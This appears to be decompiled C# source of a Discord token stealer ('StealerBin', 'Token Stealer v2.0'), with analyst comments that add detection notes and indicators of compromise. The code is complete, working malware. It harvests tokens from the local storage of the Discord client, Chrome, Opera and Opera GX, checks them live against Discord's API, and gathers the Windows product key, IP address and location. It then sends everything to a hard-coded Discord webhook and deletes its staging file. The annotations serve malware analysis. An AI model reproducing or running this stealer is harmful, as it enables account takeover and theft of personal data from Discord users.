1using System;
2using System.Collections.Generic;
3using System.Collections.Specialized;
4using System.IO;
5using System.Linq;
6using System.Management;
7using System.Net;
8using System.Net.Http;
9using System.Text;
10using System.Text.RegularExpressions;
11using System.Threading;
12using System.Web.Script.Serialization;
13using Microsoft.Win32;
14using WinProdKeyFind;
15
16namespace StealerBin
17{
18 // Token: 0x02000004 RID: 4
19 public class API
20 {
21 // Token: 0x06000005 RID: 5 RVA: 0x0000233C File Offset: 0x0000053C
// Analyst note: string-carving helper used by Get().
// Locates the first occurrence of "oken" in _Cont, skips 5 characters from that
// position, splits the remainder on '"', drops the first segment and re-joins the
// rest with '"'. The result is everything after the first double quote that follows
// the marker.
// The marker "oken" presumably stands for "token"/"Token" keys in Local Storage
// data - confirm against a sample .ldb file.
// When "oken" is absent, IndexOf returns -1 and the substring starts at offset 4.
22 private static string Sub(string _Cont)
23 {
24 string[] array = _Cont.Substring(_Cont.IndexOf("oken") + 5).Split(new char[]
25 {
26 '"'
27 });
28 List<string> list = new List<string>();
29 list.AddRange(array);
// Drop the text between the marker and the first quote.
30 list.RemoveAt(0);
31 array = list.ToArray();
32 return string.Join("\"", array);
33 }
34
35 // Token: 0x06000006 RID: 6 RVA: 0x0000239C File Offset: 0x0000059C
// Analyst note: looks for a LevelDB table file (*.ldb) in the directory named by _File.
// Returns false when the directory does not exist. Otherwise appends the name of the
// first file ending in ".ldb" to _File (passed by ref, so the caller's path is
// rewritten) and returns whether the resulting path ends in ".ldb".
// Detection: a process other than the owning browser or the Discord client enumerating
// a "Local Storage\leveldb" directory is a useful file-access telemetry signal.
36 public static bool FindTokenfile(ref string _File)
37 {
38 bool flag = !Directory.Exists(_File);
39 bool result;
40 if (flag)
41 {
42 result = false;
43 }
44 else
45 {
46 foreach (FileInfo fileInfo in new DirectoryInfo(_File).GetFiles())
47 {
48 bool flag2 = fileInfo.Name.EndsWith(".ldb");
49 if (flag2)
50 {
// Only the first match is used; _File becomes directory path + file name.
51 _File += fileInfo.Name;
52 break;
53 }
54 }
55 result = _File.EndsWith(".ldb");
56 }
57 return result;
58 }
59
60 // Token: 0x06000007 RID: 7 RVA: 0x00002420 File Offset: 0x00000620
// Analyst note: reads the whole file at _FilePath, decodes it as UTF-8 and repeatedly
// applies Sub() while the remaining text still contains "oken".
// Each pass stores the segment up to the next '"' in result, so the returned value is
// the quoted string that follows the last "oken" marker in the file ("" if the marker
// never occurs).
// In this listing the callers do not use the return value for anything visible; the
// regex pass in TokenStealer() is what feeds the report.
61 public static string Get(string _FilePath)
62 {
63 byte[] bytes = File.ReadAllBytes(_FilePath);
64 string @string = Encoding.UTF8.GetString(bytes);
65 string result = "";
66 string text = @string;
67 while (text.Contains("oken"))
68 {
69 string[] array = API.Sub(text).Split(new char[]
70 {
71 '"'
72 });
73 result = array[0];
// Re-joining the split pieces reproduces Sub(text): the loop advances past one marker per pass.
74 text = string.Join("\"", array);
75 }
76 return result;
77 }
78
79 // Token: 0x06000008 RID: 8 RVA: 0x00002490 File Offset: 0x00000690
// Analyst note: live validation of a candidate token against the Discord API.
// Sends a form POST with the candidate in the Authorization header to a hard-coded
// invite endpoint. Returns "" when the error body contains "401: Unauthorized" or the
// account-verification message, and returns the token unchanged in every other case
// (including a successful request).
// NOTE(review): a POST to an invite endpoint with a valid token presumably also joins
// the victim account to that server - confirm against the API documentation.
// Detection: the request is made with WebClient from the sample's own process, so
// proxy or EDR telemetry showing a non-Discord process calling this endpoint is a
// strong indicator. The invite code in the URL is an IoC for this sample.
80 private static string TokenCheckAcces(string token)
81 {
82 using (WebClient webClient = new WebClient())
83 {
84 NameValueCollection nameValueCollection = new NameValueCollection();
85 nameValueCollection[""] = "";
86 webClient.Headers.Add("Authorization", token);
87 try
88 {
89 byte[] array = webClient.UploadValues("https://discordapp.com/api/v6/invite/jjPsxg", nameValueCollection);
90 }
91 catch (WebException ex)
92 {
// The HTTP error body is inspected as text to decide whether the token is usable.
93 string text = new StreamReader(ex.Response.GetResponseStream()).ReadToEnd();
94 bool flag = text.Contains("401: Unauthorized");
95 if (flag)
96 {
97 token = "";
98 }
99 else
100 {
101 bool flag2 = text.Contains("You need to verify your account in order to perform this action.");
102 if (flag2)
103 {
104 token = "";
105 }
106 }
107 }
108 }
109 return token;
110 }
111
112 // Token: 0x06000009 RID: 9 RVA: 0x0000256C File Offset: 0x0000076C
// Analyst note: entry point of the collection routine.
// 1. Reads MachineGuid from HKLM\SOFTWARE\Microsoft\Cryptography (64-bit registry view)
//    and does nothing when it equals one hard-coded GUID. This is presumably an
//    exclusion for the author's own machine or a known analysis host - unconfirmed.
// 2. Otherwise runs the four collectors (Discord client, Opera, Chrome, Opera GX),
//    sends the contents of the staging file (API._savedTokens) via Send(), then
//    deletes that file.
// Every exception is swallowed, so failures leave no visible error.
// Detection and response: a MachineGuid read followed by access to several
// "Local Storage\leveldb" directories, and a short-lived file in %APPDATA% that is
// written and then deleted. On an affected host, treat every Discord session as
// compromised and invalidate it (a password change forces new tokens).
113 public static void StartSteal()
114 {
115 using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64))
116 {
117 using (RegistryKey registryKey2 = registryKey.OpenSubKey("SOFTWARE\\Microsoft\\Cryptography"))
118 {
119 bool flag = Convert.ToString(registryKey2.GetValue("MachineGuid")) == "90059c37-1320-41a4-b58d-2b75a9850d2f";
120 if (!flag)
121 {
122 try
123 {
124 API.StealTokenFromDiscordApp();
125 API.StealTokenFromOpera();
126 API.StealTokenFromChrome();
127 API.StealTokenFromOperaGX();
// The staging file is read before its existence is checked; if it is missing, the
// exception lands in the empty catch below.
128 API.Send(File.ReadAllText(API._savedTokens));
129 bool flag2 = File.Exists(API._savedTokens);
130 if (flag2)
131 {
// Cleanup of the on-disk artifact after exfiltration.
132 File.Delete(API._savedTokens);
133 }
134 }
135 catch (Exception ex)
136 {
137 }
138 }
139 }
140 }
141 }
142
143 // Token: 0x0600000A RID: 10 RVA: 0x0000264C File Offset: 0x0000084C
// Analyst note: exfiltration routine.
// Looks up the host's location, ISP and country code (wtfismyip.com/json) and its
// public IPv4/IPv6 addresses (api.ipify.org, api6.ipify.org). It then builds one text
// report from the Windows user name, that network information, API.CompleteOs
// (OS caption and Windows product key) and tokenReport, and posts it form-encoded to
// the URL in API.Hook. The post carries a fixed "username" and "avatar_url".
// All exceptions are swallowed.
// Detection: requests to public IP-lookup services followed shortly by an HTTPS POST
// to a Discord webhook path from the same process. The avatar host and the literal
// strings "Token Stealer v2.0" and "Powered by ByteTools" are usable as static
// signatures for this family.
144 private static void Send(string tokenReport)
145 {
146 try
147 {
148 API.Data data = new JavaScriptSerializer().Deserialize<API.Data>(API.wb.DownloadString("https://wtfismyip.com/json"));
149 string yourFuckingLocation = data.YourFuckingLocation;
150 string yourFuckingCountryCode = data.YourFuckingCountryCode;
151 string yourFuckingISP = data.YourFuckingISP;
152 string text = API.wb.DownloadString("https://api.ipify.org/");
153 string text2 = API.wb.DownloadString("https://api6.ipify.org/");
// Return value discarded here; the OS caption used in the report comes from API.CompleteOs.
154 API.OperatingSystem();
155 HttpClient httpClient = new HttpClient();
156 Dictionary<string, string> nameValueCollection = new Dictionary<string, string>
157 {
158 {
159 "content",
160 string.Concat(new string[]
161 {
162 "**",
163 Environment.UserName,
164 "**\n\n**IP Information**\n✯ IPv4: ",
165 text,
166 "\n✯ IPv6: ",
167 text2,
168 "\n✯ Location: ",
169 yourFuckingLocation,
170 "\n✯ ISP: ",
171 yourFuckingISP,
172 "\n✯ Country Code: ",
173 yourFuckingCountryCode,
174 "\n\n**Windows Information**",
175 API.CompleteOs,
176 "\n\n**Discord Tokens**\n",
177 string.Join("\n", new string[]
178 {
179 tokenReport
180 }),
181 "\n\nPowered by ByteTools"
182 })
183 },
184 {
185 "username",
186 "Token Stealer v2.0"
187 },
188 {
189 "avatar_url",
190 "http://acurartm.bplaced.net/Bilder/Bytetools_Logo.png"
191 }
192 };
// Synchronous wait on the POST; the response is not inspected.
193 httpClient.PostAsync(API.Hook, new FormUrlEncodedContent(nameValueCollection)).GetAwaiter().GetResult();
194 }
195 catch
196 {
197 }
198 }
199
200 // Token: 0x0600000B RID: 11 RVA: 0x000027D4 File Offset: 0x000009D4
// Analyst note: host fingerprinting via WMI.
// Runs "SELECT Caption FROM Win32_OperatingSystem" and returns the first Caption value
// as a string, or "Unknown" when the query yields nothing.
// Detection: WMI activity logging shows this query; it is common and weak alone,
// but useful when correlated with the file and network behaviour of this sample.
201 public static string OperatingSystem()
202 {
203 object obj = (from ManagementObject x in new ManagementObjectSearcher("SELECT Caption FROM Win32_OperatingSystem").Get()
204 select x.GetPropertyValue("Caption")).FirstOrDefault<object>();
205 return (obj != null) ? obj.ToString() : "Unknown";
206 }
207
208 // Token: 0x0600000C RID: 12 RVA: 0x00002834 File Offset: 0x00000A34
// Analyst note: stages one validated token on disk.
// An empty token (rejected by TokenCheckAcces) is ignored. Otherwise a line
// "<source> Token: <token>" is appended to the staging file API._savedTokens and the
// file is de-duplicated. The source label comes from the static flags, checked in the
// order Chrome, Opera, App, OperaGX. When none is set, the whole prefix is replaced by
// "Unknown".
// Always returns the token it was given.
// Forensics: the staging file holds clear-text tokens until StartSteal() deletes it,
// so a copy recovered from disk or from a file-system snapshot lists what was taken.
209 private static string SaveTokens(string token)
210 {
211 bool flag = token == "";
212 if (!flag)
213 {
214 string text = "✯ ";
215 bool chrome = API.Chrome;
216 if (chrome)
217 {
218 text += "Chrome";
219 }
220 else
221 {
222 bool opera = API.Opera;
223 if (opera)
224 {
225 text += "Opera";
226 }
227 else
228 {
229 bool app = API.App;
230 if (app)
231 {
232 text += "Discord App";
233 }
234 else
235 {
236 bool operaGX = API.OperaGX;
237 if (operaGX)
238 {
239 text += "Opera GX";
240 }
241 else
242 {
243 text = "Unknown";
244 }
245 }
246 }
247 }
248 text = text + " Token: " + token + Environment.NewLine;
249 File.AppendAllText(API._savedTokens, text);
250 API.RemoveDuplicatedLines(API._savedTokens);
251 }
252 return token;
253 }
254
255 // Token: 0x0600000D RID: 13 RVA: 0x000028F8 File Offset: 0x00000AF8
// Analyst note: rewrites the file at path keeping only the first occurrence of each line.
// The file is read fully into memory, unique lines are collected in order, and the
// result is written back through a stream opened with FileMode.Open.
// Forensics: FileMode.Open does not truncate the file, so a recovered copy may carry
// leftover bytes after the rewritten lines.
256 private static void RemoveDuplicatedLines(string path)
257 {
258 List<string> list = new List<string>();
259 StringReader stringReader = new StringReader(File.ReadAllText(path));
260 string item;
261 while ((item = stringReader.ReadLine()) != null)
262 {
263 bool flag = !list.Contains(item);
264 if (flag)
265 {
266 list.Add(item);
267 }
268 }
269 stringReader.Close();
270 StreamWriter streamWriter = new StreamWriter(File.Open(path, FileMode.Open));
271 foreach (string value in list)
272 {
273 streamWriter.WriteLine(value);
274 }
275 streamWriter.Flush();
276 streamWriter.Close();
277 }
278
279 // Token: 0x0600000E RID: 14 RVA: 0x000029B0 File Offset: 0x00000BB0
// Analyst note: collector for the Discord desktop client.
// Targets %APPDATA%\discord\Local Storage\leveldb\. When the directory exists it
// resolves the first .ldb file, reads it through Get(), sets the App source flag and
// runs TokenStealer() over the directory's .ldb files.
// The empty if-bodies are as they appear in this decompiled listing; the values they
// test are not otherwise used here.
// Detection: read access to this directory by any process other than the Discord
// client itself.
280 private static void StealTokenFromDiscordApp()
281 {
282 string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\";
283 DirectoryInfo folder = new DirectoryInfo(text);
284 bool flag = !Directory.Exists(text);
285 if (!flag)
286 {
287 bool flag2 = !API.FindTokenfile(ref text);
288 if (flag2)
289 {
290 }
291 Thread.Sleep(100);
292 string a = API.Get(text);
// The flag labels the lines that SaveTokens() writes during the TokenStealer() call below.
293 API.App = true;
294 bool flag3 = a == "";
295 if (flag3)
296 {
297 }
298 List<string> list = API.TokenStealer(folder, false);
299 bool flag4 = list == null || list.Count <= 0;
300 if (flag4)
301 {
302 }
303 }
304 }
305
306 // Token: 0x0600000F RID: 15 RVA: 0x00002A4C File Offset: 0x00000C4C
// Analyst note: collector for Google Chrome.
// Targets %LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Storage\leveldb\, which
// is the Default profile only. When the directory exists it resolves the first .ldb
// file, reads it through Get(), sets the Chrome source flag and runs TokenStealer()
// over the directory's .ldb files.
// The empty if-bodies are as they appear in this decompiled listing.
// Detection: read access to the profile's Local Storage by a process other than the
// browser.
307 private static void StealTokenFromChrome()
308 {
309 string text = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\";
310 DirectoryInfo folder = new DirectoryInfo(text);
311 bool flag = !Directory.Exists(text);
312 if (!flag)
313 {
314 bool flag2 = !API.FindTokenfile(ref text);
315 if (flag2)
316 {
317 }
318 Thread.Sleep(100);
319 string a = API.Get(text);
// The flag labels the lines that SaveTokens() writes during the TokenStealer() call below.
320 API.Chrome = true;
321 bool flag3 = a == "";
322 if (flag3)
323 {
324 }
325 List<string> list = API.TokenStealer(folder, false);
326 bool flag4 = list == null || list.Count <= 0;
327 if (flag4)
328 {
329 }
330 }
331 }
332
333 // Token: 0x06000010 RID: 16 RVA: 0x00002AE8 File Offset: 0x00000CE8
// Analyst note: core extraction pass over one Local Storage directory.
// Reads every *.ldb file in Folder (or *.log when checkLogs is true) as text and
// applies two regular expressions. These appear to match the Discord user-token and
// "mfa." token layouts in use when the sample was written. Each match is validated
// online with TokenCheckAcces() and staged with SaveTokens().
// The returned list is never populated in this listing, so the method always returns
// an empty list and the StealFound branch is never taken. The results travel only
// through the staging file.
// Before returning, all four source flags are reset.
// Any exception during enumeration or reading is swallowed.
// Detection: the two regex literals are stable static strings for signature writing,
// and each match triggers one outbound request from TokenCheckAcces().
334 private static List<string> TokenStealer(DirectoryInfo Folder, bool checkLogs = false)
335 {
336 List<string> list = new List<string>();
337 try
338 {
339 foreach (FileInfo fileInfo in Folder.GetFiles(checkLogs ? "*.log" : "*.ldb"))
340 {
341 string input = fileInfo.OpenText().ReadToEnd();
342 foreach (object obj in Regex.Matches(input, "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}"))
343 {
344 Match match = (Match)obj;
345 API.SaveTokens(API.TokenCheckAcces(match.Value));
346 }
347 foreach (object obj2 in Regex.Matches(input, "mfa\\.[\\w-]{84}"))
348 {
349 Match match2 = (Match)obj2;
350 API.SaveTokens(API.TokenCheckAcces(match2.Value));
351 }
352 }
353 }
354 catch
355 {
356 }
357 list = list.Distinct<string>().ToList<string>();
358 bool flag = list.Count > 0;
359 if (flag)
360 {
361 API.StealFound = true;
362 List<string> list2 = list;
363 int index = list.Count - 1;
364 list2[index] = (list2[index] ?? "");
365 }
// Clear the source label so the next collector starts from a clean state.
366 API.Opera = false;
367 API.Chrome = false;
368 API.App = false;
369 API.OperaGX = false;
370 return list;
371 }
372
373 // Token: 0x06000011 RID: 17 RVA: 0x00002C84 File Offset: 0x00000E84
// Analyst note: collector for Opera.
// Targets %APPDATA%\Opera Software\Opera Stable\Local Storage\leveldb\. When the
// directory exists it resolves the first .ldb file, reads it through Get(), sets the
// Opera source flag and runs TokenStealer() over the directory's .ldb files.
// The empty if-bodies are as they appear in this decompiled listing.
// Detection: read access to the profile's Local Storage by a process other than the
// browser.
374 private static void StealTokenFromOpera()
375 {
376 string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\";
377 DirectoryInfo folder = new DirectoryInfo(text);
378 bool flag = !Directory.Exists(text);
379 if (!flag)
380 {
381 bool flag2 = !API.FindTokenfile(ref text);
382 if (flag2)
383 {
384 }
385 Thread.Sleep(100);
386 string a = API.Get(text);
// The flag labels the lines that SaveTokens() writes during the TokenStealer() call below.
387 API.Opera = true;
388 bool flag3 = a == "";
389 if (flag3)
390 {
391 }
392 List<string> list = API.TokenStealer(folder, false);
393 bool flag4 = list == null || list.Count <= 0;
394 if (flag4)
395 {
396 }
397 }
398 }
399
400 // Token: 0x06000012 RID: 18 RVA: 0x00002D20 File Offset: 0x00000F20
// Analyst note: collector for Opera GX.
// Targets %APPDATA%\Opera Software\Opera GX Stable\Local Storage\leveldb\. When the
// directory exists it resolves the first .ldb file, reads it through Get(), sets the
// OperaGX source flag and runs TokenStealer() over the directory's .ldb files.
// The empty if-bodies are as they appear in this decompiled listing.
// Detection: read access to the profile's Local Storage by a process other than the
// browser.
401 private static void StealTokenFromOperaGX()
402 {
403 string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\";
404 DirectoryInfo folder = new DirectoryInfo(text);
405 bool flag = !Directory.Exists(text);
406 if (!flag)
407 {
408 bool flag2 = !API.FindTokenfile(ref text);
409 if (flag2)
410 {
411 }
412 Thread.Sleep(100);
413 string a = API.Get(text);
// The flag labels the lines that SaveTokens() writes during the TokenStealer() call below.
414 API.OperaGX = true;
415 bool flag3 = a == "";
416 if (flag3)
417 {
418 }
419 List<string> list = API.TokenStealer(folder, false);
420 bool flag4 = list == null || list.Count <= 0;
421 if (flag4)
422 {
423 }
424 }
425 }
426
427 // Token: 0x04000004 RID: 4
// Analyst note: hard-coded exfiltration endpoint (a Discord webhook URL) that Send()
// posts the report to. Treat the full URL as an IoC for this sample. It can be used
// for network blocking and reported to the platform for revocation.
428 public static string Hook = "https://discordapp.com/api/webhooks/719960809043656725/tJQfI5eCo79cjrvSQSAXdMdDXSjrTKzwrvYrkWXG7ZNGkK1DCwonNKbOJXosu_Ur4_rM";
429
430 // Token: 0x04000005 RID: 5
// Staging file for collected tokens: %APPDATA%\updatelogss.txt. SaveTokens() writes it
// and StartSteal() deletes it after sending. This is a host artifact to hunt for in
// file-creation telemetry.
431 private static string _savedTokens = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\updatelogss.txt";
432
433 // Token: 0x04000006 RID: 6
// Shared WebClient that Send() uses for the IP and geolocation lookups.
434 private static WebClient wb = new WebClient();
435
436 // Token: 0x04000007 RID: 7
// Built in the static field initializer: the OS caption from WMI plus the Windows
// product key returned by KeyDecoder.GetWindowsProductKeyFromRegistry().
// KeyDecoder is presumably from the WinProdKeyFind import - confirm.
// Both values are included in the exfiltrated report.
437 public static string CompleteOs = "\n✯ " + API.OperatingSystem() + "\n✯ Windows Key: " + KeyDecoder.GetWindowsProductKeyFromRegistry();
438
439 // Token: 0x04000008 RID: 8
// Source-label flags: each collector sets its own flag, SaveTokens() reads them and
// TokenStealer() resets them.
440 private static bool App = false;
441
442 // Token: 0x04000009 RID: 9
443 private static bool Chrome = false;
444
445 // Token: 0x0400000A RID: 10
// Assigned only inside TokenStealer(), in a branch the visible code never reaches.
446 private static bool StealFound;
447
448 // Token: 0x0400000B RID: 11
449 private static bool Opera = false;
450
451 // Token: 0x0400000C RID: 12
452 private static bool OperaGX = false;
453
454 // Token: 0x02000005 RID: 5
// Analyst note: deserialization target for the JSON that Send() downloads from
// wtfismyip.com/json. Send() reads all three properties into the report.
// The property names presumably mirror that service's JSON keys - confirm against a
// live response.
455 private class Data
456 {
457 // Token: 0x17000001 RID: 1
458 // (get) Token: 0x06000015 RID: 21 RVA: 0x00002E38 File Offset: 0x00001038
459 // (set) Token: 0x06000016 RID: 22 RVA: 0x00002E40 File Offset: 0x00001040
// Reported as "Location".
460 public string YourFuckingLocation { get; set; }
461
462 // Token: 0x17000002 RID: 2
463 // (get) Token: 0x06000017 RID: 23 RVA: 0x00002E4C File Offset: 0x0000104C
464 // (set) Token: 0x06000018 RID: 24 RVA: 0x00002E54 File Offset: 0x00001054
// Reported as "Country Code".
465 public string YourFuckingCountryCode { get; set; }
466
467 // Token: 0x17000003 RID: 3
468 // (get) Token: 0x06000019 RID: 25 RVA: 0x00002E60 File Offset: 0x00001060
469 // (set) Token: 0x0600001A RID: 26 RVA: 0x00002E68 File Offset: 0x00001068
// Reported as "ISP".
470 public string YourFuckingISP { get; set; }
471 }
472 }
473}